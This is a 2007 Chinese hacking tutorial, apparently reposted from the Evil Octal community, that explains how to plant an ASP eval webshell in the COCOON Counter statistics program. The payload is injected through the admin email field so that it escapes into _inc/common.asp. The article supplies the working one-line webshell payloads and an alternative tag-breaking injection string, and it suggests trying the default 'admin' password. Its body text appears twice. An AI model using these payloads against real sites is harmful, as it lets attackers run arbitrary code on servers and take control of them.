COCOON Counter統(tǒng)計(jì)程序后臺寫馬
更新時間:2007年01月16日 00:00:00 作者:
來源:邪惡八進(jìn)制 作者:9xiao
引用最新海洋頂端eval版中的幾句話,這里要用到的是<%eval request(chr(35))%>,
"evalExecutePP.htm的文本框里自己寫的代碼就是添用2006X2.exe轉(zhuǎn)換后生成的那個html文本框里的代碼。什么是文本框大家知道吧?不知的就去查查html吧。這樣添好了,就可以用自己的做的c端了。如果不會,你就用我的那個現(xiàn)成的“2006c端的例子.htm”吧。
S端是<%eval(request("#"))%>或<%eval request("#")%>或<%eval request(chr(35))%>等等,或不用%,自己變形吧,不多說了"
偶在本地架設(shè)了一個環(huán)境,實(shí)際操作中不能寫錯否則后悔就來不急了,在管理信箱那把cnhacker@263.net":eval request(chr(35))//復(fù)制過去,,點(diǎn)擊保存,看下_inc/common.asp的內(nèi)容
WebMasterEmail = "cnhacker@263.net\":eval request(chr(35))//"嘿嘿來執(zhí)行下,嘿嘿!成功了,統(tǒng)計(jì)程序中的后臺拿將"轉(zhuǎn)義成了\"所以這用了evalrequest(chr(35))嘿嘿,//是注釋,:在asp中就是換行,前提就是你能進(jìn)到后臺,(好多后臺管理密碼都是admin嘿嘿)php也可以這樣的嘿嘿,而且比asp利用的地方更多!需要動下配置語句的前后搭配好,利用好一些符號。
另注:黑防8期也提到了類似方法這里就貼出來,黑防中的代碼可以寫成9xiao"%><%eval request(chr(35))%><%',這個方法也比較巧妙,//和'在asp都是注釋語句!此統(tǒng)計(jì)程序還有暴庫的地方這個就不公布了!
關(guān)于php的可以參考saiy寫的phpwind后臺得shell的三種方法。
引用最新海洋頂端eval版中的幾句話,這里要用到的是<%eval request(chr(35))%>,
"evalExecutePP.htm的文本框里自己寫的代碼就是添用2006X2.exe轉(zhuǎn)換后生成的那個html文本框里的代碼。什么是文本框大家知道吧?不知的就去查查html吧。這樣添好了,就可以用自己的做的c端了。如果不會,你就用我的那個現(xiàn)成的“2006c端的例子.htm”吧。
S端是<%eval(request("#"))%>或<%eval request("#")%>或<%eval request(chr(35))%>等等,或不用%,自己變形吧,不多說了"
偶在本地架設(shè)了一個環(huán)境,實(shí)際操作中不能寫錯否則后悔就來不急了,在管理信箱那把cnhacker@263.net":eval request(chr(35))//復(fù)制過去,,點(diǎn)擊保存,看下_inc/common.asp的內(nèi)容
WebMasterEmail = "cnhacker@263.net\":eval request(chr(35))//"嘿嘿來執(zhí)行下,嘿嘿!成功了,統(tǒng)計(jì)程序中的后臺拿將"轉(zhuǎn)義成了\"所以這用了evalrequest(chr(35))嘿嘿,//是注釋,:在asp中就是換行,前提就是你能進(jìn)到后臺,(好多后臺管理密碼都是admin嘿嘿)php也可以這樣的嘿嘿,而且比asp利用的地方更多!需要動下配置語句的前后搭配好,利用好一些符號。
另注:黑防8期也提到了類似方法這里就貼出來,黑防中的代碼可以寫成9xiao"%><%eval request(chr(35))%><%',這個方法也比較巧妙,//和'在asp都是注釋語句!此統(tǒng)計(jì)程序還有暴庫的地方這個就不公布了!
關(guān)于php的可以參考saiy寫的phpwind后臺得shell的三種方法。
相關(guān)文章
緩沖區(qū)溢出:十年來攻擊和防衛(wèi)的弱點(diǎn)
緩沖區(qū)溢出:十年來攻擊和防衛(wèi)的弱點(diǎn)...2007-01-01推薦:二次發(fā)現(xiàn)桃源網(wǎng)絡(luò)硬盤漏洞
推薦:二次發(fā)現(xiàn)桃源網(wǎng)絡(luò)硬盤漏洞...2007-01-01google hack dat 又增加的一些比較新的數(shù)據(jù)
google hack dat 又增加的一些比較新的數(shù)據(jù)2007-01-01Sql Injection in DB2數(shù)據(jù)庫
Sql Injection in DB2數(shù)據(jù)庫...2007-01-01利用Session欺騙構(gòu)造最隱蔽的WebShell
利用Session欺騙構(gòu)造最隱蔽的WebShell...2007-01-01細(xì)說3721網(wǎng)絡(luò)實(shí)名“病毒”
細(xì)說3721網(wǎng)絡(luò)實(shí)名“病毒”...2007-01-01